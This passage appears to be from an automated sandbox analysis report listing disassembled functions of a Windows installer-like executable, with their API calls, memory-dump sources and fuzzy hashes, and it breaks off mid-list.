                                                                                                                                                                          Function 004594FD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C), ref: 00459510
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00459517
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C,0000000C,?), ref: 00459527
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                          • String ID: IsWow64Process$kernel32
                                                                                                                                                                          • API String ID: 4190356694-3789238822
                                                                                                                                                                          • Opcode ID: fcaea0cb5ea390e2957779cc6c4388bc8b99ab2736cec8f0383d29537c3ff7ae
                                                                                                                                                                          • Instruction ID: 286db41402bd5a718e77a505517fe7b9e08087b13d73ed085d08d002144ea244
                                                                                                                                                                          • Opcode Fuzzy Hash: fcaea0cb5ea390e2957779cc6c4388bc8b99ab2736cec8f0383d29537c3ff7ae
                                                                                                                                                                          • Instruction Fuzzy Hash: 17E04871C11619FBCB10ABF49D0DA4F7BACDB04B52F510865B405E3141E678CA448758
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00422FB4, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 182stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0043567B: __EH_prolog3_GS.LIBCMT ref: 00435685
                                                                                                                                                                          • lstrcmpiW.KERNEL32(-00000004,?,?,?,?,?,?,?,?,?,?,?,?,-00000004,PackageCode,?), ref: 0042301B
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                            • Part of subcall function 0041FAB3: __EH_prolog3.LIBCMT ref: 0041FABA
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorH_prolog3Last$lstrcmpi
                                                                                                                                                                          • String ID: F$HsG$InstallSource$PackageName
                                                                                                                                                                          • API String ID: 4151595970-4212326990
                                                                                                                                                                          • Opcode ID: cc0386ea5e6e1c9fa51aff9789436b237a985c8e7136f4fcd0164ab30dd77d2d
                                                                                                                                                                          • Instruction ID: 053585f03e5055840f7453a2bac45b095e3aff88066a652b81a0ff9d18a8dc04
                                                                                                                                                                          • Opcode Fuzzy Hash: cc0386ea5e6e1c9fa51aff9789436b237a985c8e7136f4fcd0164ab30dd77d2d
                                                                                                                                                                          • Instruction Fuzzy Hash: D2817E71A02268DEDB11DB64CD55BDEB7B4AB16308F0040EEE00977292DB785F88CF5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004065C0, Relevance: 7.7, APIs: 5, Instructions: 167fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,000000FF), ref: 0040668C
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406736
                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00406763
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersCreateFlushWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2392883816-0
                                                                                                                                                                          • Opcode ID: 8874beeada4571a0e28cfdf73eeba0568ed48687cb183ea68499c68783dd4349
                                                                                                                                                                          • Instruction ID: 62f5debe0e3e7ffa9552caaea30d86197b0b1ee403166d45280894390b5a4988
                                                                                                                                                                          • Opcode Fuzzy Hash: 8874beeada4571a0e28cfdf73eeba0568ed48687cb183ea68499c68783dd4349
                                                                                                                                                                          • Instruction Fuzzy Hash: D0517E715087009FD720DF28C844B5BB7E9BB84728F014A3EF59AA72D0DB78D958CB5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0046046A, Relevance: 7.6, APIs: 5, Instructions: 126COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                                          • Opcode ID: a03886ae4c016c619efcf61442cbf10ecaf0cd446ba12783cd027aba8e8b3cf8
                                                                                                                                                                          • Instruction ID: 6ad914f56b5651514767e750a3ed003d132d937937be266610b9d4167089d4bd
                                                                                                                                                                          • Opcode Fuzzy Hash: a03886ae4c016c619efcf61442cbf10ecaf0cd446ba12783cd027aba8e8b3cf8
                                                                                                                                                                          • Instruction Fuzzy Hash: 18410371600202BBDF288F55C881A6BB7B5EF05309F20486FE986D6242F779CA51CF5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00431C81, Relevance: 7.6, APIs: 5, Instructions: 121COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharNextW.USER32(?,?,00000000,?,?,?,?,0043131F,?,CC858012,?,?,?,?,?,0046C010), ref: 00431CBC
                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431D42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                          • Opcode ID: 212b0eca02ec0c66911f91164816a4ac6bd761ace310a780f80bf75a699cd8d9
                                                                                                                                                                          • Instruction ID: 9b8d605a96f13887df97026cbe200648c5acf8bd3d962a38117b3a13dcfaf1af
                                                                                                                                                                          • Opcode Fuzzy Hash: 212b0eca02ec0c66911f91164816a4ac6bd761ace310a780f80bf75a699cd8d9
                                                                                                                                                                          • Instruction Fuzzy Hash: 17419D35A00306DFDB209F68C58456AB7F6FF5D305B64652EE8868B320E778AD81CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0044AC48, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _malloc.LIBCMT ref: 0044AC54
                                                                                                                                                                            • Part of subcall function 00444C09: HeapAlloc.KERNEL32(?,00000000,00000001,00000001,00000000,00000000,?,00444841,00000001,00000000,00000000,?,?,0044476A,0044143B,?), ref: 00444C4C
                                                                                                                                                                          • _free.LIBCMT ref: 0044AC67
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocHeap_free_malloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2734353464-0
                                                                                                                                                                          • Opcode ID: e160bcc4c3d0cacebbcfc193296d9aae3087e556d6632f274c7e73ba45a0799d
                                                                                                                                                                          • Instruction ID: b9f73bd8a450b3cffc78f08d8f9f6c8e0b5f46b46bec20b455bb2fed55eb05ca
                                                                                                                                                                          • Opcode Fuzzy Hash: e160bcc4c3d0cacebbcfc193296d9aae3087e556d6632f274c7e73ba45a0799d
                                                                                                                                                                          • Instruction Fuzzy Hash: F4112C31844612AFFBA13F71FD8575A3BA4AF00365B11043FF94C96251DF3D8865869E
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00430B1C, Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430B40
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430B4E
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00430B58
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430B77
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430BA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CountTick
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 404621862-0
                                                                                                                                                                          • Opcode ID: e8da3cf06002def57b1f4ce7d931ce009ca4e36d52db2329bc4f0be1d6ba951f
                                                                                                                                                                          • Instruction ID: 06efedcd22a505bdc26b10d37abf8f8e9656904f8cd6eb81644b0ae740f742f1
                                                                                                                                                                          • Opcode Fuzzy Hash: e8da3cf06002def57b1f4ce7d931ce009ca4e36d52db2329bc4f0be1d6ba951f
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F216A71200704AFEB209F65DC81B27B7BAEB84714F104A1EB9428B2A0C735F811CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043F9EA, Relevance: 7.6, APIs: 5, Instructions: 59stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpy$CharNext_wcsrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2742890867-0
                                                                                                                                                                          • Opcode ID: ecef3fdfa5252b436cdd23ab3db622d8ec42d8064175b364ba003cd72f3ccda5
                                                                                                                                                                          • Instruction ID: 427e9a2e117e67f9933e0f07d9ac3128e7f4676c6faddd57416c4f280addbdb5
                                                                                                                                                                          • Opcode Fuzzy Hash: ecef3fdfa5252b436cdd23ab3db622d8ec42d8064175b364ba003cd72f3ccda5
                                                                                                                                                                          • Instruction Fuzzy Hash: 19115E329006189BD761EFA4DD40AAFB7F8FF49710F0191AAA548D7250DE349D888B98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040B808, Relevance: 7.5, APIs: 5, Instructions: 46fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,?,?,?,0040B89B,00000000,?,?,0043DE5E,?,00000000,?), ref: 0040B814
                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,?,0040B89B,00000000,?,?,0043DE5E,?,00000000,?), ref: 0040B826
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,?,0040B89B,00000000,?,?,0043DE5E,?,00000000,?), ref: 0040B839
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000,?,?), ref: 0040B857
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0040B89B,00000000,?,?,0043DE5E,?,00000000,?), ref: 0040B85E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$View$CloseCreateHandleMappingSizeUnmap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1558290345-0
                                                                                                                                                                          • Opcode ID: 650e9dba2e0a3434825c1aba41107afbdcd6a86aa70516db5dffe116626a669c
                                                                                                                                                                          • Instruction ID: 86cc450e030aa79249887fec2a4adf2032cafc84a784672eda3a3bcbbc45f06e
                                                                                                                                                                          • Opcode Fuzzy Hash: 650e9dba2e0a3434825c1aba41107afbdcd6a86aa70516db5dffe116626a669c
                                                                                                                                                                          • Instruction Fuzzy Hash: 30F0C232101224BBDB311BA69C4CD9B7E6DDF466F0B014134FA0D92221D7318800CBE8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00440AFE, Relevance: 7.5, APIs: 5, Instructions: 44fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00440B05
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          • SetErrorMode.KERNEL32(00008001,0000000A), ref: 00440B55
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(0000000A,00000080), ref: 00440B5F
                                                                                                                                                                          • DeleteFileW.KERNEL32(0000000A), ref: 00440B68
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00440B78
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileH_prolog3Mode$AttributesDeleteH_prolog3_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2831870221-0
                                                                                                                                                                          • Opcode ID: f18ed2b75a9a08ce323156f476ab805aface5c9a56b1542fa45116d469ac4968
                                                                                                                                                                          • Instruction ID: 700291c2492460f05ad3beb870aa9b289cc3e416742a7cd5fa8e256526ff0f4e
                                                                                                                                                                          • Opcode Fuzzy Hash: f18ed2b75a9a08ce323156f476ab805aface5c9a56b1542fa45116d469ac4968
                                                                                                                                                                          • Instruction Fuzzy Hash: B6012B72A00204A7FF006BB18D0A76E3F65DF44354F008126FE059B1A1CB788A55978D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004300C7, Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(?), ref: 004300CF
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004300DC
                                                                                                                                                                          • MulDiv.KERNEL32(?,00000000), ref: 004300E6
                                                                                                                                                                          • ReleaseDC.USER32 ref: 004300F4
                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00430112
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsCreateDeviceFontRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2367478762-0
                                                                                                                                                                          • Opcode ID: 73553e230529630540e84881a6acfaad7c4d8eb396e0e781fbc2bf22732756c1
                                                                                                                                                                          • Instruction ID: d4b79cfdd6cb3a3c4a5459cca3abb9e27aaa89d1bb5ee56165b169b397bf4ef6
                                                                                                                                                                          • Opcode Fuzzy Hash: 73553e230529630540e84881a6acfaad7c4d8eb396e0e781fbc2bf22732756c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF07AB2100519BFEB121F61DC09CBF3F6EEB49761B014024FE19C5060C7368D65ABB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041CB0F, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 196COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041CB19
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 0041D54A: __EH_prolog3_GS.LIBCMT ref: 0041D551
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00458F9C: __EH_prolog3_GS.LIBCMT ref: 00458FA3
                                                                                                                                                                            • Part of subcall function 00458F9C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000008,00000000,?,0000005C,0041CC00,?,-80000001,?,?), ref: 00459018
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00411344: __EH_prolog3.LIBCMT ref: 0041134B
                                                                                                                                                                            • Part of subcall function 0041159A: __EH_prolog3.LIBCMT ref: 004115A1
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
